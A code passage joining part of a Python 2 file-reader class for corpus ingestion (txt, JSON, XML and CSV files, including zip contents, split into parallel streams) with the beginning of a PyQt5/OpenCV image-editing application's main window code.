    # the named groups become column names (see _get_col_and_values_from_fname).
    regex_templates = {
        "blogger":r"(?P<id>[\d]*)\.(?P<gender>[\w]*)\.(?P<age>\d*)\.(?P<working_area>.*)\.(?P<star_constellation>[\w]*)",
    }
    # Input formatters supported per file format (names stored lower-case).
    reader_supported_formatter = {
        "json":["TwitterStreamAPI".lower()],
        "csv":["Sifter".lower()],
    }
def __init__(self, inp_path, file_format, regex_template=False,
             regex_for_fname=False, read_from_zip=False,
             end_file_marker = -1, send_end_file_marker=False,
             formatter_name=False, text_field_name = "text", id_field_name="id",
             ignore_retweets=True,stop_process_if_possible=True,
             **kwargs):
    """Validate the reader settings and collect every matching input file.

    :param inp_path: root path that is scanned for input files
    :param file_format: one of Reader.supported_file_types
    :param regex_template: name of a predefined filename pattern
        (Reader.regex_templates); mutually exclusive with regex_for_fname
    :param regex_for_fname: custom regex with named groups used to pull
        column values out of a file name (required for 'txt' input)
    :param read_from_zip: also search for and read files inside zip archives
    :param end_file_marker: sentinel yielded after each finished file when
        send_end_file_marker is True (-10 is reserved and rejected)
    :param send_end_file_marker: yield end_file_marker after every file
    :param formatter_name: input formatter (Reader.reader_supported_formatter)
    :param text_field_name: name of the field holding the text payload
    :param id_field_name: name of the field holding the row id
    :param ignore_retweets: skip retweets while reading twitter data
    :param stop_process_if_possible: try to stop the process on fatal errors

    NOTE(review): every validation failure calls sys.exit() instead of
    raising - intentional for the CLI use case, surprising as a library.
    """
    #p(read_from_zip, "read_from_zip")
    super(type(self), self).__init__(**kwargs)
    #super(BaseContent, self).__init__(**kwargs)
    #p((regex_for_fname , regex_template))
    #Input: Encapsulation:
    self._inp_path = inp_path
    self._file_format = file_format.lower()
    #self._columns_source = columns_source
    self._regex_for_fname = regex_for_fname
    self._regex_template =regex_template
    #p((self._regex_for_fname,self._regex_template))
    # formatter names are matched case-insensitively everywhere
    self._formatter_name = formatter_name.lower() if formatter_name else formatter_name
    self._text_field_name = text_field_name
    self._id_field_name = id_field_name
    self._ignore_retweets = ignore_retweets
    self._read_from_zip = read_from_zip
    self._end_file_marker = end_file_marker
    self._send_end_file_marker = send_end_file_marker
    self._stop_process_if_possible = stop_process_if_possible
    #InstanceAttributes: Initialization
    self._created_streams = 0           # generators handed out by getlazy()
    self._stream_done = 0               # how many of those ran to completion
    self.xmlroottag = False
    self.xmlchildetag = False
    self.retweet_counter = SharedCounterIntern()
    self.files_to_read_orig = []        # master list of plain files
    self.files_to_read_leftover = None  # working copy consumed per stream
    self.files_at_all_was_found = 0
    self.zips_to_read = []
    self.files_from_zips_to_read_orig = defaultdict(list)  # zip path -> member names
    self.files_from_zips_to_read_left_over = None
    self.files_number_in_zips = 0
    self.counter_lazy_getted = 0        # number of getlazy() calls (for restarts)
    self.logger.debug('Intern InstanceAttributes was initialized')
    ## Validation
    if not self._validate_given_file_format():
        sys.exit()
    if self._end_file_marker == -10:
        # -10 is the internal error marker of the row readers
        self.logger.error("Illegal value of the 'end_file_marker'. Please use another one.")
        #return False
        sys.exit()
    if not self._validation_given_path():
        sys.exit()
    if not self._validation_regex_treatment():
        sys.exit()
    self.logger.low_debug('Input was validated')
    # Extract Files from the given File Structure
    #p(self._inp_path)
    self._extract_all_files_according_given_file_format()
    self.logger.debug('An instance of Reader() was created ')
    #self.inp_obj = StringIO.StringIO()
    #self.inp_obj.write('{"id":123456}')
    ## Log Settings of the Instance
    attr_to_flag = ["files_from_zips_to_read_orig", "files_from_zips_to_read_left_over", ]
    attr_to_len = ["files_to_read_orig", "files_to_read_leftover", "zips_to_read", ]
    self._log_settings(attr_to_flag =attr_to_flag,attr_to_len =attr_to_len)
############################################################
####################__init__end#############################
############################################################
def __del__(self):
    """Finalizer: delegate cleanup to the BaseContent parent.

    BUGFIX: the original called super(type(self), self).__del__().  With
    type(self), a subclass of Reader would restart the MRO walk from
    itself and recurse infinitely; naming the class explicitly is the
    correct Python-2 super() idiom.
    """
    super(Reader, self).__del__()
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################Extern########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
###########################+++++++++############################
def _generator_helper(self, inp_obj, colnames=False, encoding="utf-8", csvdelimiter=',',f_name=False ):
    """Dispatch one input object (path or open file handle) to the reader
    matching self._file_format and yield its rows.

    Yields:
        rows from _readTXT/_readJSON/_readXML/_readCSV;
        -10 on a reader error (callers treat it as an abort signal);
        self._end_file_marker after each file when send_end_file_marker is set;
        False once for an unsupported file format.
    """
    #try:
    #output.write('{"id":123456}')
    if self._file_format == "txt":
        # txt files carry their metadata in the file name -> one row per file
        row = self._readTXT(inp_obj, encoding=encoding, columns_extract_from_fname=True, colnames=colnames)
        yield row
        if self._send_end_file_marker:
            yield self._end_file_marker
    elif self._file_format == "json":
        for row in self._readJSON(inp_obj, encoding=encoding, colnames=colnames,):
            if row == -10:
                # propagate the error marker, then stop this generator
                yield -10
                self.logger.error("ReaderError: Probably Invalid InputData. Please check logs for more information.")
                return
            yield row
        if self._send_end_file_marker:
            yield self._end_file_marker
    elif self._file_format == "xml":
        for row in self._readXML(inp_obj, encoding=encoding, colnames=colnames):
            if row == -10:
                yield -10
                self.logger.error("ReaderError: Probably Invalid InputData. Please check logs for more information.")
                return
            yield row
        if self._send_end_file_marker:
            yield self._end_file_marker
    elif self._file_format == "csv":
        # csv additionally needs the original file name for column extraction
        for row in self._readCSV(inp_obj, encoding=encoding, colnames=colnames, delimiter=csvdelimiter,f_name=f_name):
            if row == -10:
                self.logger.error("ReaderError: Probably Invalid InputData. Please check logs for more information.")
                yield -10
                return
            yield row
        if self._send_end_file_marker:
            yield self._end_file_marker
    else:
        self.logger.error("'{}'-Format not supported.".format(self._file_format), exc_info=self._logger_traceback)
        yield False
        return
def getgenerator(self, colnames=False, encoding="utf-8", csvdelimiter=',', input_path_list=False, input_zip_file_list = False):
    """Yield rows from the given plain files and zip members one after the
    other, and count this stream as done when exhausted.

    :param input_path_list: iterable of plain file paths (or False)
    :param input_zip_file_list: mapping zip-archive-path -> list of member
        names (only consulted when the instance has read_from_zip enabled)

    Yields False when both inputs are empty, {} once on a reader error
    (then stops), otherwise the rows produced by _generator_helper().
    """
    if not input_path_list and not input_zip_file_list:
        self.logger.warning("Given Generator is empty.")
        yield False
    if input_path_list:
        for path_to_file in input_path_list:
            for row in self._generator_helper(path_to_file, colnames=colnames, encoding=encoding, csvdelimiter=csvdelimiter):
                if row == -10:
                    # reader signalled invalid input -> abort this stream
                    yield {}
                    return
                yield row
    if self._read_from_zip:
        if input_zip_file_list:
            for path_to_zip, list_with_path_to_files in input_zip_file_list.iteritems():
                # NOTE(review): the ZipFile is never closed explicitly; it is
                # only released when the generator is garbage-collected.
                archive = zipfile.ZipFile(path_to_zip, 'r')
                for path_to_file in list_with_path_to_files:
                    f = archive.open(path_to_file)
                    for row in self._generator_helper(f, colnames=colnames, encoding=encoding, csvdelimiter=csvdelimiter, f_name=f.name):
                        if row == -10:
                            yield {}
                            return
                        yield row
    self._stream_done += 1
    self._print_once_ignore_retweets_counter()
def getlazy(self,colnames=False, encoding="utf-8", csvdelimiter=',', stream_number=1, adjust_to_cpu=True, min_files_pro_stream=1000, restart=True, cpu_percent_to_get=50):
    """Split all found input files into up to *stream_number* lazy streams.

    :param stream_number: wanted number of parallel generators; values < 1
        mean 'as many as the CPU allows' (internally capped at 10000)
    :param adjust_to_cpu: recompute the stream number from the current CPU
        load and min_files_pro_stream
    :param restart: start over from all files when getlazy() was called
        before (otherwise continue with the leftovers)
    :returns: a single LenGen when exactly one stream was both wished and
        created; otherwise a list of LenGen objects; [] when no files were
        found; False for an impossible stream_number.

    NOTE(review): callers rely on the mixed return types (generator /
    list / [] / False) - do not unify them without checking call sites.
    """
    self._stream_done = 0
    self.retweet_counter.clear()
    wish_stream_number = stream_number
    # a restart re-initialises the leftover bookkeeping from the master lists
    if self.counter_lazy_getted>0 and restart:
        self.files_from_zips_to_read_left_over = copy.deepcopy(self.files_from_zips_to_read_orig)
        self.files_to_read_leftover = copy.deepcopy(self.files_to_read_orig)
    self.counter_lazy_getted +=1
    if stream_number <1:
        stream_number = 10000
        adjust_to_cpu = True
        self.logger.debug("StreamNumber is less as 1. Automatic computing of strem number according cpu was enabled.")
    #p(stream_number, "stream_number")
    if self._get_number_of_left_over_files() == 0:
        self.logger.error("No one file was found in the given path ('{}'). Please check the correctness of the given path or give other (correct one) path to the text data.".format(self._inp_path))
        return []
    if adjust_to_cpu:
        stream_number= get_number_of_streams_adjust_cpu( min_files_pro_stream, self._get_number_of_left_over_files(), stream_number, cpu_percent_to_get=cpu_percent_to_get)
    if stream_number is None:
        #p((self._get_number_of_left_over_files(),self.counter_lazy_getted),"self._get_number_of_left_over_files()")
        self.logger.error("Number of input files is 0. Not generators could be returned.", exc_info=self._logger_traceback)
        return []
    #p(stream_number, "stream_number")
    if stream_number > self._get_number_of_left_over_files():
        self.logger.error("StreamNumber is higher as number of the files to read. This is not allowed.", exc_info=self._logger_traceback)
        return False
    list_with_generators = []
    # floor(files / streams); the last stream additionally takes the remainder
    number_of_files_per_stream = int(Decimal(float(self._get_number_of_left_over_files()/stream_number)).quantize(Decimal('1.'), rounding=ROUND_DOWN))
    #p((stream_number, number_of_files_per_stream), c="m")
    #self.files_from_zips_to_read_orig
    for i in range(stream_number):
        if i < (stream_number-1): # for gens in between
            files_to_read_non_zip, files_from_zips_to_read_orig = self._get_files_for_stream(number_of_files_per_stream)
        else: # for the last generator
            # -1 = take everything that is left (remainder files)
            files_to_read_non_zip, files_from_zips_to_read_orig = self._get_files_for_stream(-1)
        input_path_list= files_to_read_non_zip if files_to_read_non_zip else False
        input_zip_file_list = files_from_zips_to_read_orig if files_from_zips_to_read_orig else False
        gen = self._getlazy_single(input_path_list=input_path_list, input_zip_file_list=input_zip_file_list,colnames= colnames, encoding=encoding, csvdelimiter=csvdelimiter)
        if stream_number == 1:
            #p(wish_stream_number)
            if wish_stream_number > 1:
                return [gen]
            else:
                return gen
        list_with_generators.append(gen)
    self._created_streams = stream_number
    self.logger.info(" '{}'-streams was created. (adjust_to_cpu='{}')".format(stream_number, adjust_to_cpu))
    return list_with_generators
def _print_once_ignore_retweets_counter(self):
    """Log the total number of ignored retweets exactly once, after the
    last created stream has finished."""
    ignored = int(self.retweet_counter)
    all_streams_done = self._stream_done >= self._created_streams
    if ignored > 0 and all_streams_done:
        self.logger.info("'{}'-retweets in total was ignored.".format(ignored))
def _get_number_of_left_over_files(self):
    """Total number of files still to be consumed: plain files plus every
    file queued inside the zip archives."""
    #p(len(self.files_to_read_leftover), c="m")
    zipped = sum(len(members) for members in self.files_from_zips_to_read_left_over.values())
    return len(self.files_to_read_leftover) + zipped
def _get_files_for_stream(self,number_to_get):
    """Pop *number_to_get* files from the leftover bookkeeping.

    Plain files are taken first; once exhausted, files are taken from the
    zip leftovers (one per round, emptied archives are removed from the
    mapping).  number_to_get == -1 means 'take everything that is left'.

    :returns: (list of plain paths, defaultdict zip_path -> member names),
        or (False, False) when more files are requested than are left.
    """
    number_files_leftover = self._get_number_of_left_over_files()
    if number_to_get == -1:
        number_to_get = number_files_leftover
    if not (number_to_get <= number_files_leftover):
        self.logger.error("Given Number '{}' is higher than number of leftover '{}' files to get.".format(number_to_get, number_files_leftover), exc_info=self._logger_traceback)
        return False, False
    files_to_read_non_zip = []
    files_from_zips_to_read_orig = defaultdict(list)
    getted_number = 0
    # NOTE(review): if both sources became empty while getted_number is
    # still below number_to_get, this loop would never terminate; the
    # leftover-count guard above is assumed to rule that out - verify.
    while getted_number< number_to_get:
        try:
            files_to_read_non_zip.append(self.files_to_read_leftover.pop())
            getted_number += 1
        except IndexError:
            # plain files exhausted -> take one file out of the zip leftovers
            try:
                for k in self.files_from_zips_to_read_left_over.keys():
                    #if len(l[k]) != 0:
                    files_from_zips_to_read_orig[k].append( self.files_from_zips_to_read_left_over[k].pop() )
                    getted_number += 1
                    break
            except IndexError:
                # archive k is empty -> forget it; retried in the next round
                del self.files_from_zips_to_read_left_over[k]
    return files_to_read_non_zip, files_from_zips_to_read_orig
def _getlazy_single(self,colnames=False, encoding="utf-8", csvdelimiter=',', input_path_list=False, input_zip_file_list=False):
    """Build one row generator over the given plain files and zip members,
    wrapped in a LenGen that also reports how many files it will read."""
    total_files = 0
    if input_path_list:
        total_files += len(input_path_list)
    if input_zip_file_list:
        total_files += sum(len(members) for members in input_zip_file_list.values())
    stream = self.getgenerator(colnames=colnames, encoding=encoding, csvdelimiter=csvdelimiter,
                               input_path_list=input_path_list, input_zip_file_list=input_zip_file_list)
    return LenGen(stream, total_files)
##################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################INTERN########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
def _get_col_and_values_from_fname(self, fname, compiled_regex_for_fname):
    """Extract column values from a file name via a compiled named-group
    regex (e.g. the 'blogger' template).

    Digit-only group values are converted to int, everything else to
    unicode.  When the pattern matches more than once, later matches
    overwrite earlier ones for the same group name.

    :returns: dict {column_name: value}, or False on any failure.
    """
    try:
        col_and_values_dicts = {}
        try:
            for m in compiled_regex_for_fname.finditer(fname):
                for k,v in m.groupdict().iteritems():
                    if v.isdigit():
                        col_and_values_dicts[unicode(k)]= int(v)
                    elif isinstance(v, (int, float)):
                        # NOTE(review): regex group values are strings (or
                        # None, which raises above) - kept for safety only
                        col_and_values_dicts[unicode(k)]= v
                    else:
                        col_and_values_dicts[unicode(k)]= unicode(v)
            #p(col_and_values_dicts)
            #col_and_values_dicts = [{unicode(k): unicode(v) for k,v in m.groupdict().iteritems()} for m in compiled_regex_for_fname.finditer(fname)]
        except Exception, e:
            print_exc_plus() if self._ext_tb else ""
            self.logger.error("RegexError: RegexDictExtractor throw following Error: '{}'. ".format(e), exc_info=self._logger_traceback)
            return False
        #col_and_values_dicts = [m.groupdict() for m in compiled_regex_for_fname.finditer(fname)]
        #p(col_and_values_dicts)
        if len(col_and_values_dicts)==0:
            self.logger.critical("ColumnsExctractionFromFileNameError: Some of the columns in the given Fname '{}' wasn't detected. Following RegEx-Expression was used: '{}'. ".format(fname,self._regex_for_fname))
            return False
        return col_and_values_dicts
    except Exception as exception:
        print_exc_plus() if self._ext_tb else ""
        self.logger.critical("ColumnsExctractionFromFileNameError: Following Error was raised: '{}'. ".format(repr(exception)))
        return False
def _validation_regex_treatment(self):
    """Validate and compile the filename-regex settings.

    Exactly one of regex_template / regex_for_fname may be given; for the
    'txt' file format one of them is mandatory (txt metadata lives in the
    file name).  On success self._compiled_regex_for_fname is set.

    :returns: True when the settings are usable, False otherwise.
    """
    if self._regex_template and self._regex_for_fname:
        self.logger.error("InputValidationError: Template for Regex and Regex_for_Fname was given parallel. Please give just one of them.", exc_info=self._logger_traceback)
        return False
    if self._file_format == "txt":
        if not self._regex_template and not self._regex_for_fname:
            self.logger.error("InputValidationError: Template_for_Regex or Regex_for_Fname wasn't given. Please give one of them.", exc_info=self._logger_traceback)
            return False
    if self._regex_template and ( self._regex_template.lower() not in Reader.regex_templates):
        self.logger.error("InputValidationError: Given RegexTemplateName '{}' is not supporting! ".format(self._regex_template.lower()), exc_info=self._logger_traceback)
        return False
    if self._regex_for_fname and not isinstance(self._regex_for_fname, (str, unicode)):
        self.logger.error("InputValidationError: RegexForFname should be an str or unicode object. Given: '{}'.".format(self._regex_for_fname), exc_info=self._logger_traceback)
        return False
    if self._regex_template and not self._regex_for_fname:
        try:
            self._regex_for_fname = Reader.regex_templates[self._regex_template]
            ### set given id_field_name
            # NOTE(review): this substitutes EVERY occurrence of the
            # substring "id" in the pattern, not just the group name -
            # fine for the current 'blogger' template, fragile for new ones
            self._regex_for_fname = self._regex_for_fname.replace("id", self._id_field_name)
            self._compiled_regex_for_fname = regex.compile(self._regex_for_fname, regex.UNICODE)
        except Exception, e:
            print_exc_plus() if self._ext_tb else ""
            self.logger.error("InputValidationError: Given RegEx-Template '{}' is not exist or it wasn't possible to compile it. Check this Exception: '{}'. ".format(self._regex_template, e), exc_info=self._logger_traceback)
            return False
    elif not self._regex_template and self._regex_for_fname:
        try:
            self._compiled_regex_for_fname = regex.compile(self._regex_for_fname, regex.UNICODE)
        except Exception, e:
            print_exc_plus() if self._ext_tb else ""
            self.logger.error("InputValidationError: Given RegEx-Template '{}' is not exist or it wasn't possible to compile it. Check this Exception: '{}'.".format(self._regex_template, e), exc_info=self._logger_traceback)
            return False
    return True
# def _extract_colnames_from_regex(self, regex_for_fname):
# p(repr(regex_for_fname), c="m")
# columns_name = regex.findall(regex_for_fname, fname.strip())
# p(columns_name, c="r")
# if not isinstance(columns_name, list) or len(columns_name)==0 or len(columns_name[0])<5:
# self.logger.critical("ColumnsExctractionFromFileNameError: Some of the columns in the given Fname '{}' wasn't | |
<reponame>omarkhaled850/photo_shop_for_pros<filename>main.py<gh_stars>0
# Name : <NAME>
import imutils
from PyQt5 import QtCore, QtGui, QtWidgets
import cv2
import numpy as np
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QAction, QFileDialog, QMainWindow, QDialog, QDialogButtonBox, QVBoxLayout, QInputDialog, \
QLineEdit
# dialog message
class CustomDialog(QDialog):
    """Minimal OK/Cancel confirmation dialog titled 'HELLO!'.

    accept()/reject() are wired to the standard button box, so exec_()
    returns QDialog.Accepted or QDialog.Rejected.
    """
    def __init__(self, *args, **kwargs):
        super(CustomDialog, self).__init__(*args, **kwargs)
        self.setWindowTitle("HELLO!")
        # standard OK + Cancel buttons, laid out in platform order
        buttons = QDialogButtonBox.Ok | QDialogButtonBox.Cancel
        self.buttonBox = QDialogButtonBox(buttons)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        # NOTE(review): assigning to self.layout shadows QWidget.layout();
        # it works here, but a different attribute name would be safer
        self.layout = QVBoxLayout()
        self.layout.addWidget(self.buttonBox)
        self.setLayout(self.layout)
# qweight
class Ui_MainWindow(QMainWindow):
global_img = None
display_img = None
    def setupUi(self, MainWindow):
        """Build the whole widget tree (Qt-Designer-style generated layout).

        Creates a left-hand QToolBox with three pages (geometric operations,
        enhancement, segmentation), the central image preview label, the
        menu bar with the "Files" menu and the status bar, then calls
        retranslateUi() to set texts and connect most signals.
        Statement order follows the usual uic output: parent widgets are
        created before their children.
        """
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(800, 500)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Left column: a form layout hosting the tool box.
        self.formLayoutWidget = QtWidgets.QWidget(self.centralwidget)
        self.formLayoutWidget.setGeometry(QtCore.QRect(0, 0, 161, 421))
        self.formLayoutWidget.setObjectName("formLayoutWidget")
        self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)
        self.formLayout.setContentsMargins(0, 0, 0, 0)
        self.formLayout.setObjectName("formLayout")
        self.main_toolbox = QtWidgets.QToolBox(self.formLayoutWidget)
        self.main_toolbox.setEnabled(True)
        self.main_toolbox.setMouseTracking(False)
        self.main_toolbox.setObjectName("main_toolbox")
        # --- tool box page 1: geometric operations ---
        self.page = QtWidgets.QWidget()
        self.page.setGeometry(QtCore.QRect(0, 0, 159, 338))
        self.page.setObjectName("page")
        self.verticalLayoutWidget = QtWidgets.QWidget(self.page)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, -1, 160, 341))
        self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout.setObjectName("verticalLayout")
        self.gray_scale_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        self.gray_scale_btn.setObjectName("gray_scale_btn")
        self.verticalLayout.addWidget(self.gray_scale_btn)
        self.flip_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        self.flip_btn.setObjectName("flip_btn")
        self.verticalLayout.addWidget(self.flip_btn)
        self.rot_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        self.rot_btn.setObjectName("rot_btn")
        self.verticalLayout.addWidget(self.rot_btn)
        self.skewing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        self.skewing_btn.setObjectName("skewing_btn")
        self.verticalLayout.addWidget(self.skewing_btn)
        self.croping_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        self.croping_btn.setObjectName("croping_btn")
        self.verticalLayout.addWidget(self.croping_btn)
        self.scaling_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        self.scaling_btn.setObjectName("scaling_btn")
        self.verticalLayout.addWidget(self.scaling_btn)
        self.translation_btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        self.translation_btn.setObjectName("translation_btn")
        self.verticalLayout.addWidget(self.translation_btn)
        self.main_toolbox.addItem(self.page, "")
        # --- tool box page 2: enhancement (point + neighborhood processing) ---
        self.page_2 = QtWidgets.QWidget()
        self.page_2.setGeometry(QtCore.QRect(0, 0, 159, 338))
        self.page_2.setObjectName("page_2")
        self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.page_2)
        self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(-20, 0, 187, 295))
        self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
        self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.label = QtWidgets.QLabel(self.verticalLayoutWidget_2)
        self.label.setObjectName("label")
        self.verticalLayout_2.addWidget(self.label)
        self.negative_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.negative_btn.setObjectName("negative_btn")
        self.verticalLayout_2.addWidget(self.negative_btn)
        self.hist_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.hist_btn.setObjectName("hist_btn")
        self.verticalLayout_2.addWidget(self.hist_btn)
        self.log_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.log_btn.setObjectName("log_btn")
        self.verticalLayout_2.addWidget(self.log_btn)
        self.gamma_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.gamma_btn.setObjectName("gamma_btn")
        self.verticalLayout_2.addWidget(self.gamma_btn)
        self.blending_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.blending_btn.setObjectName("blending_btn")
        self.verticalLayout_2.addWidget(self.blending_btn)
        self.bitslicing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.bitslicing_btn.setObjectName("bitslicing_btn")
        self.verticalLayout_2.addWidget(self.bitslicing_btn)
        self.slicing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.slicing_btn.setObjectName("slicing_btn")
        self.verticalLayout_2.addWidget(self.slicing_btn)
        self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
        self.label_2.setObjectName("label_2")
        self.verticalLayout_2.addWidget(self.label_2)
        self.smoothing_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.smoothing_btn.setObjectName("smoothing_btn")
        self.verticalLayout_2.addWidget(self.smoothing_btn)
        self.sharp_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        self.sharp_btn.setObjectName("sharp_btn")
        self.verticalLayout_2.addWidget(self.sharp_btn)
        self.main_toolbox.addItem(self.page_2, "")
        # --- tool box page 3: segmentation ---
        self.page_3 = QtWidgets.QWidget()
        self.page_3.setGeometry(QtCore.QRect(0, 0, 159, 338))
        self.page_3.setObjectName("page_3")
        self.verticalLayoutWidget_3 = QtWidgets.QWidget(self.page_3)
        self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(-10, 0, 171, 80))
        self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
        self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_3)
        self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.threshold_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
        self.threshold_btn.setObjectName("threshold_btn")
        self.verticalLayout_3.addWidget(self.threshold_btn)
        self.edge_btn = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
        self.edge_btn.setObjectName("edge_btn")
        self.verticalLayout_3.addWidget(self.edge_btn)
        self.main_toolbox.addItem(self.page_3, "")
        self.formLayout.setWidget(0, QtWidgets.QFormLayout.SpanningRole, self.main_toolbox)
        # Central preview label; images are shown here as scaled QPixmaps.
        self.image_out = QtWidgets.QLabel(self.centralwidget)
        self.image_out.setGeometry(QtCore.QRect(180, 0, 581, 441))
        self.image_out.setText("")
        ##############################################################################################
        self.image_out.setPixmap(QtGui.QPixmap(""))
        self.image_out.setScaledContents(True)
        self.image_out.setObjectName("image_out")
        MainWindow.setCentralWidget(self.centralwidget)
        # Menu bar / status bar / "OpenFile" action.
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
        self.menubar.setObjectName("menubar")
        self.menuFiles = QtWidgets.QMenu(self.menubar)
        self.menuFiles.setObjectName("menuFiles")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.actionOpenFile = QtWidgets.QAction(MainWindow)
        self.actionOpenFile.setObjectName("actionOpenFile")
        self.menuFiles.addAction(self.actionOpenFile)
        self.menubar.addAction(self.menuFiles.menuAction())
        self.retranslateUi(MainWindow)
        self.main_toolbox.setCurrentIndex(1)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
        # Note: most button connections live in retranslateUi(); only the
        # rotate button is wired here.
        self.rot_btn.clicked.connect(self.rotate_fun)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.gray_scale_btn.setText(_translate("MainWindow", "gray image"))
self.flip_btn.setText(_translate("MainWindow", "flip image"))
self.rot_btn.setText(_translate("MainWindow", "rotate image"))
self.skewing_btn.setText(_translate("MainWindow", "skewing"))
self.croping_btn.setText(_translate("MainWindow", "crop"))
self.scaling_btn.setText(_translate("MainWindow", "scaling"))
self.translation_btn.setText(_translate("MainWindow", "image translation"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page),
_translate("MainWindow", "Image Operations"))
self.label.setText(_translate("MainWindow", " 1-Point Processing"))
self.hist_btn.setText(_translate("MainWindow", "histogram equalization"))
self.log_btn.setText(_translate("MainWindow", "Log transformation"))
self.gamma_btn.setText(_translate("MainWindow", "Power transformation"))
self.blending_btn.setText(_translate("MainWindow", "Image blending"))
self.bitslicing_btn.setText(_translate("MainWindow", "bite plane slicing"))
self.slicing_btn.setText(_translate("MainWindow", "Image slicing"))
self.negative_btn.setText(_translate("MainWindow", "negative"))
self.label_2.setText(_translate("MainWindow", " 2-Neighborhood Processing"))
self.smoothing_btn.setText(_translate("MainWindow", "smoothing"))
self.sharp_btn.setText(_translate("MainWindow", "sharping"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page_2),
_translate("MainWindow", "Image Enhancement"))
self.threshold_btn.setText(_translate("MainWindow", "thresholding"))
self.edge_btn.setText(_translate("MainWindow", "edge segmantation"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page_3),
_translate("MainWindow", "Image Enhancement"))
self.threshold_btn.setText(_translate("MainWindow", "thresholding"))
self.edge_btn.setText(_translate("MainWindow", "edge segmantation"))
self.main_toolbox.setItemText(self.main_toolbox.indexOf(self.page_3),
_translate("MainWindow", "Image Segmentation"))
self.menuFiles.setTitle(_translate("MainWindow", "Files"))
self.actionOpenFile.setText(_translate("MainWindow", "OpenFile"))
# connecting the open image function with the menbar button
self.actionOpenFile.triggered.connect(self.open_img)
# connecting buttons with functions
self.gray_scale_btn.clicked.connect(self.graScaleFun)
self.flip_btn.clicked.connect(self.flip_fun)
self.skewing_btn.clicked.connect(self.skewing_fun)
self.croping_btn.clicked.connect(self.crop_fun)
self.scaling_btn.clicked.connect(self.scaling_fun)
self.translation_btn.clicked.connect(self.trans_fun)
self.hist_btn.clicked.connect(self.histequ_fun)
self.log_btn.clicked.connect(self.log_fun)
self.gamma_btn.clicked.connect(self.gammacorrection)
self.blending_btn.clicked.connect(self.blend_fun)
self.slicing_btn.clicked.connect(self.slicing_fun)
self.negative_btn.clicked.connect(self.negative_fun)
self.smoothing_btn.clicked.connect(self.smoothing_fun)
self.sharp_btn.clicked.connect(self.sharp_fun)
self.threshold_btn.clicked.connect(self.threshold_fun)
self.edge_btn.clicked.connect(self.edge_fun)
self.bitslicing_btn.clicked.connect(self.bitslicing_fun)
#open a dialog fo the user to choose the image
def open_img(self):
imagePath, _ = QFileDialog.getOpenFileName()
self.global_img = cv2.imread(imagePath)
self.display_img = QPixmap(imagePath)
self.image_out.setPixmap(self.display_img)
self.resize(self.display_img.size())
self.adjustSize()
self.image_data()
def bitslicing_fun(self):
lst = []
for i in range(self.global_img.shape[0]):
for j in range(self.global_img.shape[1]):
lst.append(np.binary_repr(self.global_img[i][j], width=8))
eight_bit_img = (np.array([int(i[0]) for i in lst], dtype=np.uint8) * 128).reshape(self.global_img.shape[0],self.global_img.shape[1])
self.global_img = eight_bit_img
self.displayINlebal()
def OpenTextFile(self):
dialog = QtGui.QFileDialog()
dialog.setWindowTitle("Choose a file to open")
dialog.setFileMode(QtGui.QFileDialog.ExistingFile)
dialog.setNameFilter("Text (*.txt);; All files (*.*)")
dialog.setViewMode(QtGui.QFileDialog.Detail)
